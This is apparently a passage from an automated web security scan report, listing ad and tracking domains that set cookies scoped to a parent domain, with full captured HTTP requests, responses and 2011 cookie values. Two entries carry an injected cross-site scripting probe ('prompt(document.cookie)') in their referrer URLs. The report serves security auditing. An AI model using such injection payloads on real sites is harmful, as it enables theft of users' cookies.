Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:55:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Mon, 05-Dec-2011 12:55:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6VB-Z@twQ*TwCCvD7is8(MgCt^.O$RtMlE:ZtV:MZGqsO1q2A5/uRmd(QSn'DMBW!Tkfqr^=o6C(jUw_XyuaANf-a(SNp`lEjODQ=yVR!5SwrR.nTl'Xp6Y^Cw%8D0%!6!2Nhw=p3^_TyZV<GWi6Ga]]uLn39N-[xvKC6d*6l?-t<mjC8Pwqv!01113?+OVga; path=/; expires=Mon, 05-Dec-2011 12:55:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 06 Sep 2011 12:55:40 GMT

GIF89a.............!.......,........@..L..;

9.25. http://id.google.com/verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=5F_Tq12iuIBVmCcJ0klLu47YIN53QGzsXYjnZNlgug=GXP1xng2Bog0jgcA; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=50=bVxkgLcqEicQGWCwjN0J7lK28lXRF1qOuXMwopVHzA=1szWgyw5SFrHzZqV; expires=Wed, 07-Mar-2012 11:50:24 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 06 Sep 2011 11:50:24 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9.26. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=161&fmt=redirect&sec=0&d4=0 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; imp=a$le#1315258459362_65704651_as3105_imp|374#1315258459362_65704651_as3105_imp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p161r=b$u-32#A.8GZ|g-yWB#1.8GZ|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/
Set-Cookie: imp=a$le#1315313083617_171501150_ap3100_int|374#1315258459362_65704651_as3105_imp|; Domain=.teracent.net; Expires=Sun, 04-Mar-2012 12:44:43 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close

GIF89a.............!.......,...........D..;

9.27. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...

9.28. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:54 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:54 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^32; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69245; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3172566.js^2^1315313154^1315313154&638177.js^10^1315313154^1315313153&3218925.js^1^1315313153^1315313153; expires=Tue, 13-Sep-2011 12:45:54 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2081

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172566"
...[SNIP]...

9.29. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:52 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:50:52 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^3; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3218923.js^1^1315313452^1315313452&3172565.js^2^1315313133^1315313452&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:50:52 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1829

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3218923"
...[SNIP]...

9.30. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:53 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:45:53 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69246; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=638177.js^2^1315313132^1315313153; expires=Tue, 13-Sep-2011 12:45:53 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1843

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "638177" +
...[SNIP]...

9.31. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Tue, 06-Sep-2011 13:45:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69242; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3172565.js^2^1315313133^1315313157&638178.js^1^1315313134^1315313134; expires=Tue, 13-Sep-2011 12:45:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2069

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3172565"
...[SNIP]...

9.32. http://optimized-by.rubiconproject.com/a/dk.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^3^1315313132^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Tue, 06-Sep-2011 13:45:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^26; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69240; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3142787.js^3^1315313158^1315313159&3142736.js^5^1315313158^1315313158&3147282.js^2^1315313158^1315313158&3218923.js^1^1315313158^1315313158&638178.js^5^1315313158^1315313157&3172565.js^2^1315313158^1315313158; expires=Tue, 13-Sep-2011 12:45:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1945

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142787"
...[SNIP]...

9.33. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3018 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: act=1_1315103291; opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 11:52:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

9.34. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF0BHwHRB4EACa0QvYgQDRyEAQA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:20 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Tue, 06 Sep 2011 13:05:20 GMT
Content-Length: 39
Date: Tue, 06 Sep 2011 12:55:20 GMT
Server: QS

qc_results({"segments":[{"id":"D"}]});

9.35. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=2025226563;fpan=1;fpa=P0-1156348243-1315331724508;ns=0;url=http%3A%2F%2Fwww.myfitv.com%2Fsearch%3Futf8%3D%25E2%259C%2593%26query%3Dxss%25003d6ce%2527%253prompt(document.cookie)%2F%2F9336b0fa1c5;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315331724504;tzo=300;a=p-7elq8ZYievA_s;labels=myfitv HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EE4BHwHSB4EQCa0QvYgQDRyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:24 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 12:55:24 GMT
Server: QS


9.36. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
